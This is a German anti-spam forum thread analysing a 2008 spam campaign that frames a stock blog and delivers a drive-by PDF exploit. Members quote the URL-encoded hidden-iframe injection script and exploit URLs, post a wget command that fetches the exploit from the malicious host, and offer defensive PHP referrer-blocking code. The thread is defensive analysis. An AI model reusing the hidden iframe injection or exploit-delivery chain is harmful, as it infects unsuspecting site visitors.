Archiv verlassen und diese Seite im Standarddesign anzeigen : [Joe-Job] Aktienkrach - boersennotizbuch.de
Nebelwolf †
08.12.2008, 19:32
[Update: Vorsicht! Es handelt sich vermutlich um einen Hackerangriff auf Euere PCs (mit Internet-Explorer). Wer dem Link gefolgt ist, der sollte unbedingt seinen Computer überprüfen. Das Boersennotizbuch.de ist hier nur unfreiwillige Deko der Hacker.]
Hallo zusammen,
ein Spammer, der sich für besonders schlau hält:
From - Mon Dec 08 18:[...] 2008
Return-Path: <vtrkx[...]bmprod.com.ar>
Delivery-Date: Mon, 08 Dec 2008 18:[...] +0100
Received: from [87.226.15.201] ([87.226.15.201])
by [...] with ESMTP (Nemesis)
ID: [ID filtered]
Received: from [87.226.15.201] by mx5.serversur.net; Mon, 8 Dec 2008 19:[...] +0200
Date: Mon, 8 Dec 2008 19:[...] +0200
From: "Matthew Stevens" <vtrkx[...]bmprod.com.ar>
X-Mailer: The Bat! (v3.60.07) Professional
Reply-To: vtrkx[...]bmprod.com.ar
X-Priority: 3 (Normal)
Message-ID: [ID filtered]
To: [...]@[...].de
Subject: Aktienkrach
X-SpamScore: 0.1
tests= RDNS_NONE
Aktienkrach in Deutschland... retten Sie schnell ihre Anlagen. Weitere Infos unter:
http://net239847.cn/Beworben wird die chinesische Domain net239847.cn (http://whois.domaintools.com/net239847.cn), allerdings steht der Server in North Dakota. Auf dem Server finden sich eine Hand voll Internetseiten, die ich als eher wenig vertrauenswürdig einstufen würde (kein Impressum, fehlerhafte Funktion, etc.):
Find-online-service.com
Officialjewel.net
Sellbyinternet.com
Sieht man sich den Quelltext von net239847.cn an, dann wird es spannend, denn die Seite leitet auf eine deutsche Seite weiter:
<head>
</head><body>
<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Ciframe%2520style%253D%2522wID: [ID filtered]
</body></html>
Weitergeleitet wird auf http://www.boersennotizbuch.de (http://whois.domaintools.com/boersennotizbuch.de), die Seite ist also offensichtlich die Nutznießerin dieses Spamruns.
Nebelwolf
Hallo, ich bin der Betreiber der Seite boersennotizbuch.de
Zuerst: Ich habe mit dem ganzen Spam überhaupt nichts zu tun.
Ich habe auch einen hohen Traffic-Anstieg bei mir gemerkt und entsprechend die chinesische URL heute am späten Nachmittag. Danach habe ich nach einer Lösung gesucht, wie ich dies unterbinden kann.
Die Seite wurde per Javascript unter der fremden Domain abgerufen -- jetzt habe ich auch ein Javascript eingebaut, das einen Abruf unter fremden Domains (Frames) unterbindet (sollte dies der Fall sein werden die Besucher auf eine nicht-existente URI weitergeleitet...).
Ich frage mich jetzt aber, warum das überhaupt gemacht wurde. Was wird damit bezweckt und welche Gefahr könnte dadurch für mich oder für Dritte entstehen ?
Offensichtlich ist es auch nicht ganz ungezielt gemacht worden (weil Börsenkrach und so...)? Hat jemand einen Tip oder Rat?
Vielen Dank
Schnubbi
09.12.2008, 07:28
Ich habe mit dem ganzen Spam überhaupt nichts zu tun.
... wieso hab ich bloß das Gefühl, den Satz schon öfter gelesen zu haben... ?! :rolleyes:
Ich habe mit dem ganzen Spam überhaupt nichts zu tun.
... wieso hab ich bloß das Gefühl, den Satz schon öfter gelesen zu haben... ?! :rolleyes:
Ich glaube ihm. Denn der eigentliche Knackpunkt ist sicher der Rest vom javascript:
%253Ciframe%2520style%253D%2522position%253A%2520absolute%253Boverflow%253A%2520 hidden%253Bheight%253A%25203%253Bwidth%253A%25202%253B%2522%2520src%253D%2522htt p%253A//net239847.cn/i/%2522%253E%2520%27%3Bd%3Dunescape%28m%29%3Bdocument.write%28d%29%3B%3C/script%3EDas erzeugt einen hidden frame mit der URL http://net239847.cn/i/ als Inhalt. Und das JavaScript dort sieht richtig böse aus, also Finger wech, vor allem mit dem IE.
Kleiner Tipp für saviano: Wenn es möglich ist, zeig den Usern, die mit Referrern von dieser/diesen CN-Domain(s) gleich einen Hinweis auf das Iframing und gib gleich noch einen Link zu bekannten Virenscannern mit an.
Nachtrag: Das Ding versucht, je nach installierten Plugins, einen Fehler im Adobe Acrobat auszunutzen. Zumindest wird angefragt, ob der installiert ist.
Sollte jemand die Scripts benötigen, bitte PM.
Kleiner Tipp für saviano: Wenn es möglich ist, zeig den Usern, die mit Referrern von dieser/diesen CN-Domain(s) gleich einen Hinweis auf das Iframing und gib gleich noch einen Link zu bekannten Virenscannern mit an.
Falls Du Hilfe beim Coding in PHP brauchst einfach hier nachfragen. :)
Hallo,
danke für die Antworten. Ich habe wirklich damit nichts zu tun -- meine Seite betreibe ich ganz ehrlich seit mehreren Jahren...
Ja, ich glaube ich werde Hilfe mit dem PHP brauchen (ich schick noch eine PM). Heute früh habe ich laut Traffic-Meter einige Besucher (4-5) mit den 2 Referrals, die spammen. Irgendwie laden sie jetzt einen pdf -- (dauerte irgendwie lang und ich habe abgebrochen). Zumindest sind die Besuche auf diese 4-5 zurückgegangen.
Muss ich meinen PC scanen lassen?
Irgendwie laden sie jetzt einen pdf -- (dauerte irgendwie lang und ich habe abgebrochen). [...]
Muss ich meinen PC scanen lassen?
Wenn Du selbst versucht hast, die CN-URLs aufzurufen, dann ja. In diesem Fall könnte schon die Acrobat-Schwachstelle ausgenutzt worden sein.
truelife
09.12.2008, 10:59
Muss ich meinen PC scanen lassen?
Wenn du Hilfe brauchst, melde dich mal.
Zuallerest würde ich Logs von HiJackThis und eScan anfertigen und diese checken...
Ja, ich habe sie abgerufen. Gestern wollte das Ding kein pdf laden. Heute schon. Ich benutze FF. Bin gerade am scanen.
Hallo saviano,
ich würde folgenden Codeschnippsel (natürlich die Texte noch angepasst) ganz oben an Deine index.php, oder wie immer auch die zuerst aufgerufenen Seite bei Dir heisst, hinpappen:
<?php
if ( isset($_SERVER['HTTP_REFERER']) && preg_match('/\d+\.cn/',$_SERVER['HTTP_REFERER']) ) {
// entweder
print "Irgendeine Information, die den User warnt.";
// oder
Header('Location: http//link.zu.einer.warn/seite.html');
exit;
}
?>
Wichtig ist nur, dass Du nur eine der beiden Ausgaben (print oder den Header-Redirect) nutzt und der ganze Sums wirklich ganz am Anfang des Seitenquelltextes steht.
Der Ausdruck im preg_match fackelt alle Domains ab, die nach dem Muster "eine oder mehrere Zahlen.cn" aufgebaut sind.
Das hier auf die Frontpage (index.php) ganz oben nach "<?php" einbinden:
Ungetestet:
$url = parse_url($_SERVER['HTTP_REFERER']);
if ($url["host"]=="net239847.cn") {
print "<h1>Your computer could be compromised! Please check it with a virus scanner!</h1>"
exit;
}
Bin mal zwei Stunden weg, die anderen können Dir sicher auch helfen wenn das Script nicht tut.
UPDATE: Die Lösung von Homer ist natürlich universeller. ;)
Hey, danke.
Ich benutze Wordpress. Wenn sich jemand auskennt: es gibt dort eine index.php (auf die muss ich per ftp zugreifen, bin leider nicht zu hause), die -- soweit ich nachvollziehen kann auf die home.php, unter themes, weiterleitet. Tut es auch wenn ich den code in den header.php kopiere?
Zweite Frage: Die zweite Domain, die spammt, ist keine .cn (soll ich die posten?), sondern eine .com -- wie gehe ich damit um (Lösung 1 und/oder Lösung 2)?
Danke nochmal
Ich benutze Wordpress. Wenn sich jemand auskennt: es gibt dort eine index.php (auf die muss ich per ftp zugreifen, bin leider nicht zu hause), die -- soweit ich nachvollziehen kann auf die home.php, unter themes, weiterleitet. Tut es auch wenn ich den code in den header.php kopiere?
Ich kenne mich mit WP nicht aus, würde es aber an den Anfang der index.php setzen. BTW: WP hatte in letzter Zeit auch das eine oder andere Sicherheitsproblem. Ich hoffe, Du hast fleißig Patches eingespielt?
Die zweite Domain, die spammt, ist keine .cn (soll ich die posten?), sondern eine .com
Ja, poste mal. Man kann beide Lösungen relativ einfach um weitere Domains erweitern.
Nebelwolf †
09.12.2008, 11:48
Hallo Martin,
Wordpress hatte in den letzten Jahren einige Sicherheitslücken. Es kann auch möglich sein, daß auf Deinem Server etwas passiert ist, also schau einfach mal ob Dir Unregelmäßigkeiten, wie z.B. aktuelle Dateidaten auffallen.
Ich verschiebe den Thread nachher zu dem JoeJobs, dann taucht er nicht in den Suchmaschinen auf.
Nebelwolf
ps. Martin ist auf den Thread aufmerksam geworden, weil sich Leute bei ihm beschwert haben.
Die andere Domain ist: http://www.sofia18-online.com/. Letzter Zugriff, der registriert wurde, war heute 9:11 (von diesem zweiten Referral) -- seitdem ist (erstmal) Ruhe...
Die Dateidaten muss ich mir erst heute Abend zu Hause anschauen (ich habe ein 1&1 Package, kein Server). Mein Wordpress ist auf Version WordPress 2.6.3.
Dann man update auf 2.6.5!
Ist eigentlich eines der einfacheren Sorte, da man lediglich 5 Dateien austauscht.
Ansonsten empfehle ich so oder so Bad Behavior (http://www.bad-behavior.ioerror.us/) (*), das blockt schon sehr viele Dinge ab - vor allem in Zusammenarbeit mit http:BL (ist quasi mit dabei) :)
(*) Falls der Link dahin unerwünscht bitte die URL vereinzeln...
Die andere Domain ist: http://www.sofia18-online.com/.
Dann muss die Zeile mit dem if so aussehen:
if ( isset($_SERVER['HTTP_REFERER']) && ( preg_match('/\d+\.cn/',$_SERVER['HTTP_REFERER']) || preg_match('/sofia18-online\.com/',$_SERVER['HTTP_REFERER']) ) ) {
oder in der Kriechtier-Lösung ;):
if ($url["host"]=="net239847.cn" || $url["host"]=="www.sofia18-online.com") {
Hmm...
Der Server unter net239847.cn konnte nicht gefunden werden.
Sofia18 liefert noch den iframe von web483745.cn/i/.
Nachtrag: Aber was da steht bekomm' ich so net decodiert... funktioniert möglicherweise nur mit einem Scriptteil, der vorher (vor dem IFRAME) eingebunden wurde...?
Ich wollte noch mein Schnipsel-Code von gestern posten. Das habe ich vorne im header hinzugefügt (ich glaube, die Seite lädt noch über die index.php kurz und dann leitet sie, wenn von anderer location abgerufen, auf die Phantasie-URL weiter...
<script language="JavaScript">
if (top.location != self.location) {
top.location = self.location.href="http://hgdshagsdjahsgdjahgdj.com"
}
</script>
Ist es schlimm, wenn ich bis zum Abend warte mit den Lösungen hier, oder muss ich mich bemühen, irgendwie so schnell wie möglich die index.php zu ändern?...
PS: Gescannt habe ich bei mir -- keine Funde; HijackThis lieferte keine Warnungen (die einigen Fragezeichen scheinen mir von nachvollziehbaren Anwendungen zu kommen -- wage ich zu urteilen...).
Sofia18 liefert noch den iframe von web483745.cn/i/
Schade, die Domain ist kap0tt gegangen:
homer [at] springfield:~> wget "http://net239847.cn/i/pdf.php?id=2379"
--2008-12-09 XX:XX:XX-- http://net239847.cn/i/pdf.php?id=2379
Auflösen des Hostnamen »net239847.cn«.... fehlgeschlagen: Der Name oder der Dienst ist nicht bekannt.
wget: kann die Host-Adresse »net239847.cn« nicht auflösen
Nachtrag: Aber was da steht bekomm' ich so net decodiert... funktioniert möglicherweise nur mit einem Scriptteil, der vorher (vor dem IFRAME) eingebunden wurde...?
Nö, da musst Du einfach den letzten eval-Befahl mal durch "alert" ersetzen, dann kriegst Du den Quelltext vernünftig angezeigt, sogar mit Einrückung!
Ansonsten ist das der gleiche Mist wie auf der CN-Domain, nur die ID: [ID filtered]
truelife
09.12.2008, 15:02
PS: Gescannt habe ich bei mir -- keine Funde; HijackThis lieferte keine Warnungen (die einigen Fragezeichen scheinen mir von nachvollziehbaren Anwendungen zu kommen -- wage ich zu urteilen...).
Du kannst diesen gerne per PN an mich weiterleiten, oder ihn mir per Mail (siehe Signatur) zusenden, wenn du magst. Ich schaue dann mal drüber...
Update: Das Boersennotizbuch scheint aus der Schusslinie. Neues Opfer ist die Domain boerse.de, die derzeit über sofia18-online.com angesprungen wird. Der Iframe dort holt sich www.maria19-cam24.com/i/ und von dort wird dann der PDF-Exploit wieder von www.sofia18-online.com/i/pdf.php?id=121&vis=1 geholt.
blackblox
09.12.2008, 18:40
die sofia-18-blabla wird gerade auch kräftig sonstwie gespammt (z. B. Billigspam, der nur den Link enthält) ...
Mittwoch
09.12.2008, 20:02
Mein Spamordner listet in den letzten drei Stunden siebzehn Mails mit diesem Text, dazu kämen noch die serverseitig bereits entsorgten Exemplare, über deren Zahl nur meine Provider etwas wissen. Die scheinen es allerdings schon sehr nötig zu haben.
Glücklicherweise sind drei von vier der beworbenen Domains nicht (mehr?) erreichbar, kann sein, dass ein Hoster da die Notbremse gezogen hat.
Schönen Gruß
Mittwoch
Grisu_LZ22
09.12.2008, 21:43
Gehört das auch hierher?
Return-Path: <dwsalm [at] sal.pt>
Received: from mailin15.aul.t-online.de (mailin15.aul.t-online.de
[172.20.27.49])
by mhead205 with LMTP; Tue, 09 Dec 2008 xx:xx:xx +0100
X-Sieve: CMU Sieve 2.2
Received: from static-78-139-143-43.caucasus.net ([78.139.143.43]) by
mailin15.aul.t-online.de
with esmtp ID: [ID filtered]
Received: from [78.139.143.43] by mail.sal.pt; Wed, 10 Dec 2008 xx:xx:xx +0400
From: "Elmer Reeder" <dwsalm [at] sal.pt>
To: <fake [at] ddy>
Subject: RE: Verkaufen
Date: Wed, 10 Dec 2008 xx:xx:xx +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
Thread-Index: [filtered]
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.2663
Message-ID: [ID filtered]
X-TOI-SPAM: n;1;2008-12-09Txx:xx:xxZ
X-TOI-VIRUSSCAN: clean
X-TOI-EXPURGATEID:
149288::081209213724-53A6DBB0-C1C63FE6/2467936840-3329458328/0-1
X-TOI-SPAMCLASS: CLEAN, NORMAL
X-TOI-MSGID: [ID filtered]
X-Seen: false
X-ENVELOPE-TO: <meine [at] addy>
und
Return-Path: <dwsierrabmwm [at] sierrabmw.com>
Received: from mailin17.aul.t-online.de (mailin17.aul.t-online.de
[172.20.27.50])
by mhead205 with LMTP; Tue, 09 Dec 2008 xx:xx:xx +0100
X-Sieve: CMU Sieve 2.2
Received: from user ([91.123.28.187]) by mailin17.aul.t-online.de
with esmtp ID: [ID filtered]
Received: from [91.123.28.187] by mx00-dom.earthlink.net; Tue, 9 Dec 2008
xx:xx:xx +0300
Message-ID: [ID filtered]
From: "Walter Romo" <dwsierrabmwm [at] sierrabmw.com>
To: <fake>
Subject: RE: Verkaufen
Date: Tue, 9 Dec 2008 xx:xx:xx +0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4927.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
X-TOI-SPAM: n;1;2008-12-09Txx:xx:xxZ
X-TOI-VIRUSSCAN: clean
X-TOI-EXPURGATEID:
149288::081209214155-45807BB0-4C6092D9/2467936840-3329458328/0-1
X-TOI-SPAMCLASS: CLEAN, NORMAL
X-TOI-MSGID: [ID filtered]
X-Seen: false
X-ENVELOPE-TO: <meine [at] ddy>
Folgende Adresse wurde Ihnen empfohlen:
"Totale Rezession in Deutschland"
http://aktien-news-online24.com/
Hallo Leute, bei mir ist diese Mail auch schon 8 oder 9mal aufgeschlagen immer in ähnlicher Form:
Return-Path: <tege1 [at] cq.com>
Received: from 83.234.137.2 ([83.234.137.2] helo=[83.234.137.2] envelope-sender=<tege1 [at] cq.com>)
by SMTPIN-02.smtp.email.vodafone.de with ESMTP
ID: [ID filtered]
Message-ID: [ID filtered]
From: "Patti Blackmon" <tege1 [at] cq.com>
To: <*****@vodafone.de>
Subject: Aktienkrach
Date: Tue, 9 Dec 2008 xx:xx:xx +0300
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-Spam: Not detected
der Text ist immer der geiche:
Aktienkrach in Deutschland... retten Sie schnell ihre Anlagen. Weitere Infos unter:
http://net239847.cn/
Ich frag mich nur, warum die sich um meine Aktien sorgen und woher wollen die wissen, das ich überhaupt welche habe :clown: :D
Weil ich hab noch nicht mal ein Konto geschweige denn irgendwo Geld angelegt ;)
Return-Path: <hcvetmc [at] bmscom.com>
Delivery-Date: Wed, 10 Dec 2008 xx:xx:xx +0100
Received-SPF: softfail (mxeu5: transitioning domain of bmscom.com does not designate 84.17.17.156 as permitted sender) client-ip=84.17.17.156; envelope-from=hcvetmc [at] bmscom.com; helo=17.156.leased.lanck.net;
Received: from 17.156.leased.lanck.net (17.156.leased.lanck.net [84.17.17.156])
by mx.kundenserver.de (node=mxeu5) with ESMTP (Nemesis)
ID: [ID filtered]
Received: from [84.17.17.156] by bmscom.com.s5b2.psmtp.com; Wed, 10 Dec 2008 xx:xx:xx +0300
Message-ID: [ID filtered]
From: "Meagan Rushing" <hcvetmc [at] bmscom.com>
To: <???@???.de>
Subject: RE: Verkaufen
Date: Wed, 10 Dec 2008 xx:xx:xx +0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Envelope-To: ???@???.de
Folgende Adresse wurde Ihnen empfohlen:
"Totale Rezession in Deutschland"
http://aktien-news-online24.com/
An alle, die mitgeholfen haben: Vielen Dank!
Ich wollte mich nochmal bei den Forum-Mitgliedern bedanken. Ich habe gestern den fälligen Upgrade durchgeführt und den vorgeschlagenen Code (Lösung Homer) in die index.php reingetan... Ich hoffe, dies hält erstmal (und viel mehr: ich hoffe, man gerät erst gar nicht ins Visier von Spammern und ähnlichen Zeitgenossen).
Danke.
Bei mir ist heute in mehreren Honigtopf-Accounts folgendes eingetroffen:
Folgende Adresse wurde Ihnen empfohlen:
"Totale Rezession in Deutschland"
http://aktien-news-online24.com/
Diese Seite leitet weiter auf www.maria19-cam24.com/i
Dort passiert auch nicht sonderlich viel - ich nehme an, es soll ein Virus oder ein Wurm installiert werden. Da das bei mir scheinbar nicht geklappt hat kann ich nicht sagen, was genau los ist. Vielleicht findet sich hier ja noch ein Experte, der der Sache auf den Grund gehen möchte :-)
Grüße
P.S. Header unspektakulär
Schnubbi
10.12.2008, 14:21
Guggstdu hier: http://www.antispam-ev.de/forum/showthread.php?p=186478#post186478 ;)
@ mods: tackern?
ach gugg.... beim suchen mit der Suche hab ich da nix gefunden. sowas :-)
Naja - also bitte löschen/schliessen/verschieben oder sonstwas.
Danke
schara56
10.12.2008, 20:41
...] Der Iframe dort holt sich www.maria19-cam24.com/i/ und von dort wird dann der PDF-Exploit wieder von www.sofia18-online.com/i/pdf.php?id=121&vis=1 geholt. [...Das wundert nicht besonders wenn man sich den zuständigen Nameserver (ns1.mcdomen.com) mit den dort hinterlegten Zonen ansieht:
aktien-news-online24.com NS ns1.mcdomen.com
maria19-cam24.com NS ns1.mcdomen.com
sofia18-online.com NS ns1.mcdomen.com
mcdomen.com NS ns1.mcdomen.com
ns1.mcdomen.com A 204.11.236.45
web483745.cn NS ns1.mcdomen.com
net239847.cn NS ns1.mcdomen.com
whv67.cn NS ns1.mcdomen.com
Nummer 1:
Return-Path: <teleut [at] qdusa.com>
Received: from 94.180.218.167 ([94.180.218.167] helo=7001757f5cdf4ce envelope-sender=<teleut [at] qdusa.com>)
by SMTPIN-08.smtp.email.vodafone.de with ESMTP
ID: [ID filtered]
Received: from [94.180.218.167] by qdusa.com.s8a2.psmtp.com; Wed, 10 Dec 2008 xx:xx:xx +0300
Message-ID: [ID filtered]
From: "Colette Harden" <teleut [at] qdusa.com>
To: <******@vodafone.de>
Subject: Aktienkrach
Date: Wed, 10 Dec 2008 xx:xx:xx +0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Aktienkrach in Deutschland... retten Sie schnell ihre Anlagen. Weitere Infos unter:
www.Sofia18-online.com
Nummer 2:
Return-Path: <fbyuh [at] bmg-labtechnologies.com>
Received: from 92.255.180.117 ([92.255.180.117] helo=4f49a6e56a6945b envelope-sender=<fbyuh [at] bmg-labtechnologies.com>)
by SMTPIN-15.smtp.email.vodafone.de with ESMTP
ID: [ID filtered]
Received: from [92.255.180.117] by mailin3.rmx.de; Wed, 10 Dec 2008 xx:xx:xx +0300
Message-ID: [ID filtered]
From: "Nicholas Sherwood" <fbyuh [at] bmg-labtechnologies.com>
To: <*****@vodafone.de>
Subject: Aktienkrach
Date: Wed, 10 Dec 2008 xx:xx:xx +0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="windows-1250"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Aktienkrach in Deutschland... retten Sie schnell ihre Anlagen. Weitere Infos unter:
www.Sofia18-online.com
Nummer 3:
Return-Path: <crxuhm [at] bpkengor.com>
Received: from 92.49.173.223 ([92.49.173.223] helo=[92.49.173.223] envelope-sender=<crxuhm [at] bpkengor.com>)
by SMTPIN-08.smtp.email.vodafone.de with ESMTP
ID: [ID filtered]
Received: from [92.49.173.223] by mail5.zoneedit.com; Wed, 10 Dec 2008 xx:xx:xx +0500
Date: Wed, 10 Dec 2008 xx:xx:xx +0500
From: "Toni Duke" <crxuhm [at] bpkengor.com>
X-Mailer: The Bat! (v3.0.0.15) Professional
Reply-To: crxuhm [at] bpkengor.com
X-Priority: 3 (Normal)
Message-ID: [ID filtered]
To: *****@vodafone.de
Subject: Aktienkrach
MIME-Version: 1.0
Content-Type: text/plain;
charset=us-ascii
Content-Transfer-Encoding: 7bit
nur dieses Mal mit nem anderen Text:
Aktienkrach in Deutschland... retten Sie schnell ihre Anlagen. Weitere Infos unter:
http://net239847.cn/
die Spamcrew sollte sich langsam mal was Neues einfallen lassen, ich hab noch immer kein Geld an der Börse :clown: :clown:
Powered by vBulletin® Version 4.2.3 Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.